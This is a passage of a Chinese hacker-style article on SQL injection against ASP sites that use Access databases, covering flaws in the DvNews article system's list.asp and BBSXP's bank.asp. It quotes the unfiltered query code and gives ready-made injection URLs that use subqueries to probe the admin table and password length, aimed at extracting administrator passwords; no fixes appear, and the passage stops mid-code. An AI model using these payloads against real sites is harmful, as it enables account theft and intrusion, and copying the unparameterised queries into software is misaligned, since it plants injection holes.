>>>Dedicated This Scrap To CaoJing<<< 

很多朋友在ACCESS下进行SQL注入攻击的时候，总会抱怨：ACCESS功能太弱了，没有注释符、不支持多语句查询…另一方面，很多程序员在使用ACCESS做数据库写程序时，往往只对那些对敏感表的操作代码执行严格审查，而其他一些表的操作代码就很粗糙了。这只能说我们对ACCESS了解太少了，前不久我有幸看到了一个专门的ACCESS站点，其论坛划分了很多版块，竟然全是和ACCESS有关的；原来这里头的学问还蛮多的，我等只是略懂皮毛而已。小弟愚笨，没能力写概览型的文章，还是通过几个例子来向大家说明些问题： 

一：动网文章 

涉及版本： 
^^^^^^^^^^ 
动网文章所有版本 

描述： 
^^^^^^ 
动网文章是一款由WWW.ASPSKY.NET开发和维护的源代码开放的文章管理系统，在国内使用非常广泛；由于其list.asp文件没有过滤用户提交传递给SQL查询的输入，导致远程攻击者可以利用这个漏洞进行SQL注入攻击。 

具体： 
^^^^^^ 
试看list.asp中的相关代码： 
15 sql=”select Aclass.class,ANclass.Nclass,article.title,article.classid,article.Nclassid from article,Aclass,ANclass where article.classid=Aclass.classid and article.Nclassid=ANclass.Nclassid and article.articleID=”&request(“id”) 

id没有经任何检查就直接放到SQL查询中，这点大家都很容易看出来，但说到利用，一些朋友就可是犯难了：这个语句对应的表是 article ，但管理密码在 admin 表里面，ACCESS又不能执行多语句查询，这个bug有什么用啊？呵呵，我们使用子查询不就得了，方法好多哦： 

http://www.target.com/asp/darticle/list.asp?id=(select id from admin where flag=1) 

http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where flag=1) 

http://www.target.com/asp/darticle/list.asp?id=1 and exists (select id from admin where flag=1) 

http://www.target.com/asp/darticle/list.asp?id=1 and article.articleID  in (select top 1 id from admin where len(password)>1 order by id) 
等等… 

怎么得到管理员密码就不用我废话了吧：） 

二：BBSXP 

涉及版本： 
^^^^^^^^^^ 
BBSXP所有版本 

描述： 
^^^^^^ 
BBSXP是一款由WWW.BBSXP.COM开发和维护的源代码开放的Asp论坛；由于作者采用的安全防护措施过于简单，导致整个论坛多个文件存在Sql Injection漏洞，非法用户可以很快地智能破解任意用户口令或进行其他恶意攻击。 

具体： 
^^^^^^ 
前不久我写了篇关于BBSXP漏洞的文章，作者简单的把论坛升了级，但仍然没有全面解决Sql Injection的问题，比如说： 
bank.asp 
——————————————————————————- 
152  sql=”select * from user where username='”&request(“dxname”)&”‘” 
153  rs1.Open sql,Conn,1,3 
154  if rs1.eof then 
155  message=message&”